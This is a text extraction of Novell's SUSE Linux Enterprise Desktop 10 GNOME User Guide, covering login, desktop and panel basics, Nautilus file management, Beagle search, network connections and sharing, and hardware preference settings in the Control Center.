Congratulations on choosing the SUSE® Linux* Enterprise Desktop (SLED). This manual is designed to introduce you to the GNOME graphical desktop environment and show: • Part I, “GNOME Desktop,” on page 13 • Part II, “Office and Collaboration,” on page 63 • Part III, “Internet,” on page 123 • Part IV, “Multimedia,” on page 133 • Part V, “Appendixes,” on page 153 Audience This guide is intended for SLED users using the GNOME desktop. Feedback We want to hear your comments and suggestions about this manual and the other documentation included with this product. Please use the User Comments feature at the bottom of each page of the online documentation, or go to and enter your comments there. Documentation Updates For the latest version of this documentation, see the SUSE Linux Enterprise Desktop documentation () Web site. Additional Documentation ().
11
novdocx (ENU) 01 February 2006
Documentation Conventions In Novell documentation, a greater-than symbol (>) is used to separate actions within a step and items in a cross-reference path. A trademark symbol (®, TM, etc.) denotes a Novell trademark. An asterisk (*) denotes a third-party trademark.
12
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
I
GNOME Desktop
I
GNOME Desktop
13
novdocx (ENU) 01 February 2006
14
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Getting Started with the GNOME Desktop
1
1
This chapter assists you in becoming familiar with the conventions, layout, and common tasks of SUSE® Linux Enterprise Desktop (SLED) with the GNOME desktop. If you have not yet installed SLED, see the SUSE Linux Enterprise Desktop Quick Start ( nld/qsnld/data/brmch9i.html). • Section 1.1, “Starting SLED,” on page 15 • Section 1.2, “Logging Out,” on page 16 • Section 1.3, “Desktop Basics,” on page 17 • Section 1.4, “Accessing Folders and Files,” on page 20 • Section 1.5, “Opening or Creating Documents with OpenOffice.org,” on page 29 • Section 1.6, “Exploring the Internet,” on page 29 • Section 1.7, “E-mail and Calendering,” on page 29 • Section 1.8, “Moving Text between Applications,” on page 29 • Section 1.9, “Other Useful Programs,” on page 30 • Section 1.10, “Obtaining Software Updates,” on page 30
1.1 Starting SLED
When you start SLED, you are prompted to enter your username and password. This is the username and password you created when you installed SLED. If you did not install SLED, check with your system administrator for the username and password. The login has three menu items: • Login Prompt: Enter your username and password to log in. • Session: Specify the desktop to run during your session. If other desktops are installed, they appear in the list. • Actions: Perform a system action, such as shut down the computer, reboot the computer, or configure the Login Manager. • Section 1.1.1, “What Is a Session?,” on page 15 • Section 1.1.2, “Switching Desktops,” on page 16 • Section 1.1.3, “Locking Your Screen,” on page 16
1.1.1 What Is a Session?
A session is the period of time from when you log in to when you log out. The login screen offers several login options. For example, you can select the language of your session so that text that appears in the SLED interface is presented in that language.
Getting Started with the GNOME Desktop
15
novdocx (ENU) 01 February 2006
After your username and password are authenticated, the Session Manager starts. The Session Manager lets you save certain settings for each session. It also lets you save the state of your most recent session and return to that session the next time you log in. The Session Manager can save and restore the following settings: • Appearance and behavior settings, such as fonts, colors, and mouse settings. • Applications that you were running. such as a file manager or an OpenOffice.org program. TIP: You cannot save and restore applications that Session Manager does not manage. For example, if you start the vi editor from the command line in a terminal window, Session Manager cannot restore your editing session. For information on configuring session preferences, see “Managing Sessions” on page 56.
1.1.2 Switching Desktops
If you installed both the GNOME and the KDE desktops, use the following instructions to switch desktops. 1 Click Computer > Logout > OK. In KDE, click N > Logout > Logout. 2 On the SUSE Linux Enterprise Desktop login screen, click Session. 3 Select the desktop you want (GNOME or KDE), then click OK. 4 Type your username, then press Enter. 5 Type your password, then press Enter.
1.1.3 Locking Your Screen
To lock the screen, you can do either of the following: • Click Computer > Lock Screen. • If the Lock button is present on a panel, click it. To add the Lock button to a panel, right-click the panel and then click Add to Panel > Actions > Lock. When you lock your screen, the screen saver starts. To lock your screen correctly, you must have a screen saver enabled. To unlock the screen, move your mouse to display the locked screen dialog. Enter your username and password, then press Enter. For information on configuring your screen saver, see “Configuring the Screen Saver” on page 43.
1.2 Logging Out
When you are finished using the computer, click Computer > Logout. Then select one of the following: • Log out Logs you out of the current session and returns you to the Login dialog.
16
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
• Shut down Logs you out of the current session, then turns off the computer. • Restart the computer Logs you out of the current session, then restarts the computer. • Suspend the computer Saves the current memory contents to disk and shuts down the computer. When you restart, the saved memory content is loaded and you can resume where you left off.
1.3 Desktop Basics
As with other common desktop products, the main components of the GNOME desktop are icons that link to files, folders, or programs, as well as the panel at the bottom of the screen (similar to the Task Bar in Windows). Double-click an icon to start its associated program. Right-click an icon to access additional menus and options. You can also right-click any empty space on the desktop to access additional menus for configuring or managing the desktop itself.. For more information about using Nautilus, see “Managing Folders and Files with Nautilus File Manager” on page 20. Right-clicking an icon displays a menu offering file operations, like copying, cutting, or renaming. Selecting Properties from the menu displays a configuration dialog. The title of an icon as well as the icon itself can be changed with Select Custom Icon. The Emblems tab lets you add graphical descriptive symbols to the icon. The Permissions tab lets you set access permissions for the selected files. The Notes tab lets you manage comments. The menu for the trash can additionally features the Empty Trash option, which deletes its contents. A link is a special type of file that points to another file or folder. When you perform an action on a link, the action is performed on the file or folder the link points to. When you delete a link, you delete only the link file, not the file that the link points to. To create a link on the desktop to a folder or a file, access the object in question in File Manager by right-clicking the object and then clicking Make Link. Drag the link from the File Manager window and drop it onto the desktop. • Section 1.3.1, “Default Desktop Icons,” on page 17 • Section 1.3.2, “Desktop Menu,” on page 18 • Section 1.3.3, “Bottom Panel,” on page 18 • Section 1.3.4, “Adding Applets and Applications to the Panel,” on page 19 • Section 1.3.5, “Main Menu,” on page 20
1.3.1 Default Desktop Icons
To remove an icon from the desktop, simply drag it onto the trash can. However, be careful with this option—if you move folder or file icons to the trash can, the actual data is deleted. If the icons only represent links to a file or to a directory, only the links are deleted.
Getting Started with the GNOME Desktop
17
novdocx (ENU) 01 February 2006
NOTE: You cannot move the Home icon to the trash.
1.3.2 Desktop Menu
Right-clicking an empty spot on the desktop displays a menu with various options. Click Create Folder to create a new folder. Create a launcher icon for an application with Create Launcher. Provide the name of the application and the command for starting it, then select an icon to represent it. You can also change the desktop background and align desktop icons.
1.3.3 Bottom Panel
The desktop includes a panel across the bottom of the screen. The bottom panel contains the Computer menu (similar to the Start menu in Windows) and the icons of all applications currently running. You can also add applications and applets to the panel for easy access. If you click the name of a program in the taskbar, the program's window is moved to the foreground. If the program is already in the foreground, a mouse click minimizes it. Clicking a minimized application reopens the respective window.
Figure 1-1 GNOME Bottom Panel
The Show Desktop icon is on the right side of the bottom panel. This icon minimizes all program windows and displays the desktop. Or, if all windows are already minimized, it opens them up again. If you right-click an empty spot in the panel, a menu opens, offering the options listed in the following table:
Table 1-1 Panel Menu Options
Option
Description
Add to Panel Properties Delete This Panel Allow Panel to be Moved
Opens a menu list of applications and applets that can be added to the panel. Modifies the properties for this panel. Removes the panel from the desktop. All of the panel settings are lost. Locks the panel in its current position (so that it can’t be moved to another location on the desktop, and unlocks the panel (so it can be moved). To move the panel to another location, middle-click and hold on any vacant space on the panel, and then drag the panel to the location you want.
New Panel Help About Panels
Creates a new panel and adds it to the desktop. Opens the Help Center. Opens information about the panel application.
18
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
1.3.4 Adding Applets and Applications to the Panel
You can add applications and applets to the bottom panel for quick access. An applet is a small program, while an application is usually a more robust stand-alone program. Adding an applet puts useful utilities where you can easily access them. The GNOME desktop comes with many applets. You can see a complete list by right-clicking the bottom panel and selecting Add to Panel. Some useful applets include the following:
Table 1-2 Some Useful Applets
Applet
Description
Command Line Dictionary Lookup Force Quit Search for Files Sticky Notes Stock Ticker Traditional Main Menu
Enter commands in a small entry field. Look up a word in an online dictionary. Terminate an application. This is especially useful if you want to terminate an application that is no longer responding. Find files, folders, and documents on the computer. Create, display, and manage sticky notes on your desktop. Display continuously updated stock quotes. Access programs from a menu like the one in previous versions of GNOME. This is especially useful for people who are used to earlier versions of GNOME. Increase or decrease the sound volume. Display current weather information for a specified city. Access additional work areas, called workspaces, through virtual desktops. For example, you can open applications in different workspaces and use them on their own desktops without the clutter from other applications.
Volume Control Weather Report Workspace Switcher
Getting Started with the GNOME Desktop
19
novdocx (ENU) 01 February 2006
1.3.5 Main Menu
Open the main menu by clicking Computer on the far left of the bottom panel. Commonly used applications appear in the main menu. A search field lets you quickly search for applications and files. Access additional applications, listed in categories, by clicking More Applications.
Figure 1-2 Main Menu
1.4 Accessing Folders and Files
SUSE Linux Enterprise Desktop enables you to access folders and files on your computer and on a network. • Section 1.4.1, “Managing Folders and Files with Nautilus File Manager,” on page 20 • Section 1.4.2, “Accessing Floppy Disks, CDs, or DVDs,” on page 22 • Section 1.4.3, “Finding Files on Your Computer,” on page 23 • Section 1.4.4, “Accessing Files on the Network,” on page 25
1.4.1 Managing Folders and Files with Nautilus File Manager
Use the Nautilus File Manager to create and view folders and documents, run scripts, and create CDs of your data. In addition, Nautilus provides support for Web and file viewing. You can open Nautilus in the following ways: • Click Computer > Nautilus. • Click your Home directory icon on the desktop
20
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Figure 1-3 Nautilus File Manager
You can change to the browser mode by right-clicking the folder and then clicking Browse Folder. This gives you a familiar view with a location window that shows the current path and buttons for common functions. This applies to the current Nautilus window.
Figure 1-4 Nautilus File Manager in Browser Mode
You can change the preferences for files and folders in Nautilus by clicking Edit > Preferences > Behavior, then selecting from the following options:
Table 1-3 Nautilus Options
Option
Description
Single Click to Activate Item
Performs the default action for an item when you click the item. If this option is selected and you point to an item, the title of the item is underlined. Performs the default action for an item when you double-click the item.
Double Click to Activate Items
Getting Started with the GNOME Desktop
21
novdocx (ENU) 01 February 2006
Option
Description
Always Open in Browser Windows Run Executable Files When They Are Clicked
Opens Nautilus in Browser mode whenever you open it. Runs an executable file when you click the file. An executable file is a text file than can execute (that is, a shell script). Displays the contents of an executable file when you click the file. Displays a dialog when you click an executable file. The dialog asks whether you want to execute the file or display the file. Displays a confirmation message before the Trash is emptied or before files are deleted.
View Executable Files When They Are Clicked Ask Each Time
Ask Before Emptying Trash or Deleting Files
Include a Delete Command That Bypasses Trash Adds a Delete menu item to the Edit menu and the pop-up menu that is displayed when you right-click a file, folder, or desktop object. When you select an item and then click Delete, the item is immediately deleted from your file system.
Some simple shortcuts for navigating include the following:
Table 1-4 Nautilus Navigation Shortcuts
Shortcut
Description
Backspace or Alt+Up-arrow Up or Down Alt+Down, or Enter Shift+Alt+Down Shift+Alt+Up Shift+Ctrl+W Ctrl+L Alt+Home
Opens the parent folder. Selects an item. Opens an item. Opens an item and closes the current folder. Opens the parent folder and closes the current folder. Closes all parent folders. Opens a location by specifying a path or URL. Opens your home directory.
For more information, click Help > Contents in Nautilus.
1.4.2 Accessing Floppy Disks, CDs, or DVDs
To access floppy disks, CDs, or DVDs, insert the medium into the appropriate drive. For several types of removable media, a Nautilus window pops up automatically when the media is inserted or attached to the computer. If Nautilus does not open, double-click the icon for that drive to view the contents.
22
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
WARNING: Do not simply remove floppy disks from the drive after using them. Floppy disks, CDs, and DVDs must always be unmounted from the system first. Close all File Manager sessions still accessing the medium, then right-click the icon for the medium and select Eject from the menu. Then safely remove the floppy disk or CD when the tray opens automatically. Floppy disks can also be formatted by clicking Computer > More Applications > System > Floppy Formatter. In the Floppy Formatter dialog, select the density of the floppy disk and the file system settings: Linux native (ext2), the file system for Linux, or DOS (FAT) to use the floppy with Windows systems.
1.4.3 Finding Files on Your Computer
To locate files on your computer, click Computer, enter your search terms in the Search field, then press Enter. The results are displayed in the Desktop Search dialog box.
Figure 1-5 Desktop Search Dialog Box
You can use the results lists to open a file, forward it via e-mail, or display it in the file manager. Simply right-click an item in the results list and select the option you want. The options available for an item in the results list depend on the type of file it is. Clicking a file in the list displays a preview of the file and information such as the title, path, and when the file was last modified or accessed. Use the Search menu to limit your search to files in a specific location, such as your address book or Web pages, or to display only a specific type of file in your results list. The Sort menu lets you sort the items in your results list according to name, relevance, or the date the file was last modified. You can also access Desktop Search by clicking Computer > More Applications > System > Beagle Search Tool, pressing F12, or clicking on the bottom panel.
Getting Started with the GNOME Desktop
23
novdocx (ENU) 01 February 2006
Search Tips • You can use both upper and lowercase letters in search terms. Searches are not case sensitive by default. To perform a case sensitive search, put double quotation marks (“) around the word you want to match exactly. For example, if you use “APPLE” in a search, apple would be ignored. • To search for optional terms, use OR (for example, apples OR oranges). IMPORTANT: The OR is case-sensitive when used to indicate optional search terms. • To exclude search terms, use a minus sign (-) in front of the term you want to exclude (for example, apples -oranges would find results containing apples but not oranges). • To search for an exact phrase or word, put quotation marks (“) around the phrase or word. • Common words such as “a,” “the,” and “is” are ignored. • The base form of a search term is used when searching (for example, a search for “driving” will match “drive,” “drives,” and “driven”). Performing a Property Search By default, the Beagle search tool looks for search terms in the text of documents and in their properties. To search for a word in a particular property, use property_keyword:query. For example, author:john searches for files that have “john” listed in the Author property.
Table 1-5 Supported Property Keywords
Keyword
Property
album artist author comment creator extension or ext mailfrom mailfromaddr mailinglist mailto mailtoaddr tag title
Album of the media Artist Author of the content User comments Creator of the content File extension (for example, extension:jpeg or ext:mp3). Use extension:or ext: to search in files with no extension. E-mail sender name E-mail sender address Mailing list ID E-mail recipient name E-mail recipient address FSpot and Digikam image tags Title
24
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Property searches follow the rules mentioned in Section , “Search Tips,” on page 24. You can use property searches as an exclusion query or OR query, and phrases can be used as query. For example, the following line will search for all PDF or HTML documents containing the word “apple” whose author property contains “john” and whose title does not contain the word “oranges.” apple ext:pdf OR ext:html author:john -title:oranges Setting Search and Indexing Preferences Use the Search Preferences dialog box to set search and indexing preferences. To open Search Preferences, click Computer > More Applications > System > Beagle Settings. You can also click Search > Preferences in the Desktop Search dialog box. On the Search tabbed page, click Start search & indexing services automatically to start the search daemon when you log in (this is selected by default). You can also choose the keystrokes that will display the Desktop Search window by specifying any combination of Ctrl, Alt, and a function key. F12 is the default keystroke. On the Indexing tabbed page, you can choose to index your home directory (selected by default), to not index your home directory, and to add additional directories to index. Make sure you have rights to the directories you add. You can also specify resources that you don’t want indexed (see Section , “Preventing Files and Directories from Being Indexed,” on page 25 for more information). Preventing Files and Directories from Being Indexed Use the Search Preferences dialog box to specify resources that you don’t want indexed. These resources can include directories, patterns, mail folders, or types of objects. 1 Click Computer > More Applications > System > Beagle Search Tool. 2 Click Search > Preferences. 3 On the Indexing tabbed page, click Add in the Privacy section. 4 Select a resource to exclude from indexing, then specify the path to the resource. 5 Click OK twice.
1.4.4 Accessing Files on the Network
This chapter helps you access network resources using the following tasks: • “Connecting to Your Network” on page 25 • “Managing Network Connections” on page 27 • “Accessing Network Shares” on page 27 • “Sharing Directories from Your Computer” on page 28 Connecting to Your Network There are essentially two ways that you can connect to a network: via wired and wireless connections. To view your network connection status, click Computer. In the Status area of the main
Getting Started with the GNOME Desktop
25
novdocx (ENU) 01 February 2006
menu, The Network Connections icon shows your network connection status. For example, in the following figure, the computer is connected to a wired network using an Ethernet connection.
Figure 1-6 Network Connections Icon in the Main Menu
Click on the icon to get information about your connection, such as IP address, gateway address, and similar details. Connecting to a Wired Connection 1 Make sure that an Ethernet cable is connected to your computer's network interface card. 2 Click the Network Connections icon on the main panel, then click Ethernet: eth0. After a wired network connection is established, the Network Connections icon changes to show your connection type. A connection to the network is confirmed when Wired is listed next to the Network menu item. You can also confirm connectivity by clicking the Network Connections icon. If connected, the Connection Information window displays your IP address and other details about your connection. Connecting to a Wireless Connection 1 Make sure that your computer contains a wireless network interface card. 2 Click the Network Connections icon on the main panel, then click Wireless: <device>. The Network Connections icon changes to a wireless signal strength bar, and any detected wireless networks are displayed in the Network Connections menu. If your network name is displayed, select the network name from the Network Connections menu. After you are connected, the Network Connections icon shows that you have a wireless connection. If you do not see your wireless network name in the Network Connections menu: 1 Click the Network Connections icon on the main panel, then click Other. 2 In the Specify an ESSID dialog, type the wireless network name in the ESSID: field. 3 (Conditional) If the wireless network is encrypted, click Show Encryption Key to display the Encryption Key field.
26
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
4 Type the encryption code, then click OK. Your wireless network's name should now appear in the Network Connections menu. 5 Select the wireless network's name. Upon connection, the Network Connections icon turns blue. You can also confirm connection by clicking the Network Connections icon and viewing Connection Information. If connected, your IP address and other details are displayed in the Connection Information dialog. Managing Network Connections The Network Connection icon lets you monitor, manage, and configure your network connections. Clicking the icon opens a window that displays which network connection is active, if you have more than one network device in your computer. For example, if your laptop computer is configured to use a wireless port and a port for a network cable, you will see two network connections in the list. If you are connected to the network via a cable and need to switch to use your wireless, simply click the Network Connections icon and then click Wireless: eth1. SLED switches your network connection and acquires a new IP address, if needed. IMPORTANT: Prior to making the change, you should save any data, because the change in services might require that certain applications or services be restarted. Using the menu, you can view connection informations such as the IP address being used and your hardware address. If you need to update or make changes to your network settings, click Computer > Control Panel > Configure Network. This launches the Network Card Setup wizard, which steps you through the configuration process. Using this option requires you to provide the password for root. Accessing Network Shares Other network devices, like workstations and servers, can be set up to share some or all of their resources. Typically, files and folders are marked to let remote users access them. These are called network shares. If your system is configured to access network shares, you can use Nautilus File Manager to access them. To access network shares, double-click Computer > Nautilus, then click Network Servers. The window displays the network shares that you can access. Double-click the network resource that you want to access. You might be required to authenticate to the resource by providing a username and password. To access NFS shares, double-click the UNIX Network icon. A list of UNIX shares available to you is displayed.
Getting Started with the GNOME Desktop
27
novdocx (ENU) 01 February 2006
To access Windows shares, double-click the Windows Network icon. The Windows shares available to you are displayed.
Figure 1-7 Workgroups on a Windows Network
Adding a Network Place 1 Click Computer > Nautilus > File > Connect to Server. 2 Specify the name you want displayed for this link and its URL, then click Connect. An icon for the network place is added to the desktop. Sharing Directories from Your Computer You can make directories on your computer available to other users on your network. Enabling Sharing Use YaST to enable sharing on your computer. In order to enable sharing, you must have root privileges and be a member of a workgroup or domain. 1 Click Computer > More Applications > System > YaST. 2 In YaST, click Network Services > Windows Domain Membership. 3 In the Windows Domain Membership module, click Allow Users To Share Their Directories. 4 Click Finish. Sharing a Directory If directory sharing is enabled on your computer, use the following steps to configure a directory to be shared. 1 Open Nautilus and browse to the directory you want to share. 2 Right-click the folder for the directory you want to share, then click Sharing Options. 3 Select the Share this folder check box, then type the name you want to use for this share. 4 If you want other users to be able to copy files to your shared directory, select the Allow other people to write in this folder check box. 5 (Optional) Type a comment, if desired. 6 Click Create Share.
28
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
1.5 Opening or Creating Documents with OpenOffice.org
For creating and editing documents, SLED includes OpenOffice.org, a complete set of office tools that can both read and save Microsoft Office file formats. OpenOffice.org has a word processor, a spreadsheet, a data base, a drawing tool, and a presentation program. To get started, click Computer > OpenOffice.org Writer or select an OpenOffice.org module by clicking Computer > More Applications > Office, then select the module you want to open. A number of sample documents and templates are included with OpenOffice.org. You can access the templates by clicking File > New > Templates and Documents. In addition, you can use AutoPilot, a feature which guides you through the creation of letters and other typical documents. For a more in-depth introduction to OpenOffice.org, see Chapter 3, “The OpenOffice.org Office Suite,” on page 65 or view the help in any OpenOffice.org program.
1.6 Exploring the Internet
SLED includes Firefox, a Mozilla* based Web browser. You can start it by clicking Computer > Firefox. You can type an address into the location bar at the top or click links in a page to move to different pages, just like in any other Web browser. For more information, see Chapter 9, “Browsing with Firefox,” on page 125.
1.7 E-mail and Calendering
Novell Evolution seamlessly combines e-mail, a calendar, an address book, and a task list in one easy-to-use application. With its extensive support for communications and data interchange standards, Evolution can work with existing corporate networks and applications, including Microsoft Exchange. To start Evolution, click Computer > More Applications > Communicate > Evolution E-Mail or Computer > More Applications > Office > Evolution Calendar.. For more information, see Chapter 4, “Evolution: E-Mail and Calendaring,” on page 85 and Chapter 5, “GroupWise Linux Client: E-Mailing and Calendaring,” on page 99.
1.8 Moving Text between Applications
To copy text between applications, select the text and then move the mouse cursor to the position where you want the text copied. Click the center button on the mouse or the scroll wheel to copy the text. When copying information between programs, you must keep the source program open and paste the text before closing it. When a program closes, any content from that application that is on the clipboard is lost.
Getting Started with the GNOME Desktop
29
novdocx (ENU) 01 February 2006
1.9 Other Useful Programs
In addition to the programs already discussed, like applets you can add to a panel, SLED also includes additional programs, organized in categories in the Application Browser. To access the programs, open the Application Browser by clicking Computer > More Applications, then browse through the categories to see which applications are available. Categories include the following:
Table 1-6 SLED Applications
Category
Types of Programs
Audio & Video Browse Communicate Development Games Images Office
Music players, CD database, video editors, CD and DVD burners, volume controllers, and other audio and video applications Applications for browsing the Internet and your computer’s file system E-mail, instant messaging, video conferencing, and other communication tools Web development, MONO documentation, sharing files between computers Card games, arcade favorites, and puzzles Image viewers and editors, drawing programs, photo browsers, scanning programs Word processors and text editors, spreadsheets, presentation software, database software, project management utilities, PDF reader, personal information managers, calendars Search tools, system configuration tools, network tools, device managers System customization, search configuration, calculators, and other tools
System Tools
Following chapters in this guide describe some of the more commonly used applications.
1.10 Obtaining Software Updates
Novell offers important updates and enhancements that help protect your computer and ensure that it runs smoothly through ZenWorks®. The Software Update feature is designed to help you manage the software you have on your computer and to install, update, and remove programs without your having to track dependencies and resolve conflicts. Contact your system administrator for more information about how your company is disseminating updates. To access the update tool, click Computer > More Applications > System > Update Software. If updates are available, the Zen Update icon appears in the notification area of the bottom panel. In this case, click the icon to access the update tool.
30
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
2
Customizing Your Settings
You can change the way SUSE® Linux Enterprise Desktop (SLED) looks and behaves to suit your own personal tastes and needs. Some of the settings you might want to change include: • Desktop background • Screen saver • Keyboard and mouse configuration • Sounds • File associations These settings and others can be changed in the Control Center. To access the Control Center, click Computer > Control Center. The Control Center is divided into the following four categories: • Section 2.1, “Hardware,” on page 32 • Section 2.2, “Look and Feel,” on page 40 • Section 2.3, “Personal,” on page 47 • Section 2.4, “System,” on page 51
Figure 2-1 GNOME Control Center
2 ( bsj9luh.html) in the SUSE Linux Enterprise Desktop Deployment Guide.
Customizing Your Settings
31
novdocx (ENU) 01 February 2006
2.1 Hardware
Hardware settings include the following: • Section 2.1.1, “Configuring Bluetooth Services,” on page 32 • Section 2.1.2, “Configuring Your Graphics Card and Monitor,” on page 32 • Section 2.1.3, “Modifying Keyboard Preferences,” on page 32 • Section 2.1.4, “Configuring the Mouse,” on page 36 • Section 2.1.5, “Installing and Configuring Printers,” on page 38 • Section 2.1.6, “Configuring Removable Drives and Media,” on page 39 • Section 2.1.7, “Configuring a Scanner,” on page 39 • Section 2.1.8, “Specifying Screen Resolution Settings,” on page 40
2.1.1 Configuring Bluetooth Services
Bluetooth services enable you to connect wireless devices such as mobile phones and personal data assistants (PDAs) to your computer. Bluetooth wireless support includes automatic recognition of Bluetooth-enabled devices via the YaST central configuration and administration tool. Click Computer > Control Center > Hardware > Bluetooth, then set the configuration options that are appropriate for your device. NOTE: Root privileges are required for configuring Bluetooth services.
2.1.2 Configuring Your Graphics Card and Monitor
Your graphics card was configured for your monitor when you installed SLED. If you ever need to change these settings, click Computer > Control Center > Hardware > Graphics Card and Monitor, then set the appropriate options for your monitor. NOTE: Graphics card configuration is done in YaST2 and requires root privileges.
2.1.3 Modifying Keyboard Preferences
Use the Keyboard Preferences tool to modify the autorepeat preferences for your keyboard and to configure typing break settings. Click Computer > Control Center > Hardware > Keyboard. You can set the following preferences: • Keyboard • Typing Break • Layouts • Layout Options
32
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Configuring Keyboard Preferences Use the Keyboard tabbed page to set general keyboard preferences.
Figure 2-2 Keyboard Preferences Dialog—Keyboard Page
You can modify any of the following keyboard preferences:
Table 2-1 Keyboard Preferences
Option
Description
Key Presses Repeat When Key is Held Down
Enables keyboard repeat. The action associated with a key is performed repeatedly when you press and hold that key. For example, if you press and hold a character key, the character is typed repeatedly. Use the Delay option to select the delay from the time you press a key to the time that the action repeats. Use the Speed option to set the speed at which the action is repeated.
Cursor Blinks in Text Boxes and Fields Type to Test Settings
Lets the cursor blink in fields and text boxes. Use the slider to specify the speed at which the cursor blinks. The test area is an interactive interface that lets you see how the keyboard settings affect the display as you type. Type text in the test area to test the effect of your settings.
Click the Accessibility button to start the Keyboard accessibility preference tool.
Customizing Your Settings
33
novdocx (ENU) 01 February 2006
Configuring Typing Break Preferences Use the Typing Break tabbed page to set typing break preferences.
Figure 2-3 Keyboard Preferences Dialog—Typing Break Page
You can modify any of the following typing break preferences:
Table 2-2 Typing Break Preferences
Option
Description
Lock Screen to Enforce Typing Break Locks the screen when you are due a typing break. Work Interval Lasts Break Interval Lasts Allow Postponing of Breaks Lets you specify how long you can work before a typing break occurs. Lets you specify the length of your typing breaks. Lets you postpone typing breaks.
Click the Accessibility button to start the Keyboard accessibility preference tool.
34
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Configuring Keyboard Layout Preferences Use the Layouts tabbed page to set your keyboard layout.
Figure 2-4 Keyboard Preferences Dialog—Layouts Page
Select your keyboard model from the drop-down list, then use the navigational buttons to add or remove the selected layout to or from the list of available layouts. You can select different layouts to suit different locales. Click the Accessibility button to start the Keyboard accessibility preference tool. Configuring Keyboard Layout Options Use the Layout Options tabbed page to set your keyboard layout options.
Figure 2-5 Keyboard Preferences Dialog—Layout Options Page
Select an option from the list of available layout options and click Add to add the option or Remove to remove it.
Customizing Your Settings
35
novdocx (ENU) 01 February 2006
Click the Accessibility button to start the Keyboard accessibility preference tool.
2.1.4 Configuring the Mouse
Use the Mouse Preference tool to configure your mouse for right-hand use or for left-hand use. You can also specify the speed and sensitivity of mouse movement. Click Computer > Control Panel > Hardware > Mouse. You can customize the settings for the Mouse Preference tool in the following areas: • Buttons • Cursors • Motion Configuring Button Preferences Use the Buttons tabbed page to specify whether the mouse buttons are configured for left-hand use. You can also specify the delay between clicks for a double-click.
Figure 2-6 Mouse Preferences Dialog—Buttons Page
The following table lists the mouse button preferences you can modify.
Table 2-3 Mouse Button Preferences
Option
Description
Left-handed Mouse Timeout
Configures your mouse for left-hand use, swapping the functions of the left mouse button. Use the slider to specify the amount of time that can pass between clicks when you double-click. If the interval between the first and second clicks exceeds the time that is specified here, the action is not interpreted as a double-click.
36
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Configuring Cursor Preferences Use the Cursors tabbed page to set your mouse pointer preferences.
Figure 2-7 Mouse Preferences Dialog—Cursors Page
The following table lists the mouse pointer preferences you can modify.
Table 2-4 Mouse Pointer Preferences
Option
Description
Cursor Theme Highlight the Pointer When You Press Ctrl
Displays the available cursor themes. Enables a mouse pointer animation when you press and release Ctrl. This feature can help you locate the mouse pointer.
Customizing Your Settings
37
novdocx (ENU) 01 February 2006
Configuring Motion Preferences Use the Motion tabbed page to set your preferences for mouse movement.
Figure 2-8 Mouse Preferences Dialog—Motion Page
The following table lists the mouse motion preferences you can modify.
Table 2-5 Mouse Motion Preferences
Option
Description
Acceleration Sensitivity Threshold
Use the slider to specify the speed at which your mouse pointer moves on your screen when you move your mouse. Use the slider to specify how sensitive your mouse pointer is to movements of your mouse. Use the slider to specify the distance that you must move an item before the move action is interpreted as a drag and drop action.
2.1.5 Installing and Configuring Printers
Use the Printers module to install and configure printers.
38
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
To start the Printers module, click Computer > Control Center > Hardware > Printers.
Figure 2-9 Printers Dialog
For more information about setting up printing, see Chapter 8, “Managing Printers,” on page 121.
2.1.6 Configuring Removable Drives and Media
SLED supports a wide variety of removable drives and media, including storage devices, cameras, scanners, and more. The configurations for many of these devices are set up automatically when SLED is installed. To change the configuration for a drive or other removable device, click Computer > Control Center > Hardware > Removable Drives and Media. Some of the possible configuration settings include: • What happens when a blank CD is inserted in the CD drive • What happens when an audio CD is inserted in the drive • Whether images are automatically imported from a digital camera when it is attached to the computer • Whether removable storage devices are mounted when they are plugged in to the computer • Whether PDAs are automatically synced when attached to the computer In general, you do not need to change the settings that are already configured unless you want to change the behavior when a device is connected or if you want to connect a new device that is not yet configured. If you attach a device for the first time and it behaves in an unexpected or undesired way, check the Removable Drives and Media settings.
2.1.7 Configuring a Scanner
The Scanner configuration enables you to attach and configure a scanner, or to remove an alreadyattached scanner. NOTE: Scanner configuration is done in YaST2 and requires root privileges. To open YaST2 and configure a scanner, click Computer > Control Center > Hardware > Scanner. Refer to the instructions on the Scanner Configuration screen for information about the available options.
Customizing Your Settings
39
novdocx (ENU) 01 February 2006
2.1.8 Specifying Screen Resolution Settings
Use this module to specify the resolution settings for your screen, including Resolution and Refresh Rate. Click Computer > Control Center > Hardware > Screen Resolution.
Figure 2-10 Screen Resolution Preferences Dialog
The following table lists the screen resolution preferences you can modify.
Table 2-6 Screen Resolution Preferences
Option
Description
Resolution Refresh Rate Make Default for This Computer Only
Select the resolution (in pixels) to use for the screen. Select the refresh rate to use for the screen. Makes the screen resolution settings the default settings only for the computer that you are logged in to.
If you cannot find a setting you want, you might need to use the Administrator Settings to reconfigure your graphics card and monitor settings. See Configuring the Graphics Card and Monitor ( bsj9mwg.html#bsmqn45) in the SUSE Linux Enterprise Desktop Deployment Guide for more information.
2.2 Look and Feel
Look and Feel settings include the following: • Section 2.2.1, “Changing the Desktop Background,” on page 41 • Section 2.2.2, “Configuring Fonts,” on page 42 • Section 2.2.3, “Configuring the Screen Saver,” on page 43 • Section 2.2.4, “Choosing a Theme,” on page 44 • Section 2.2.5, “Customizing Window Behavior,” on page 46
40
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
2.2.1 Changing the Desktop Background
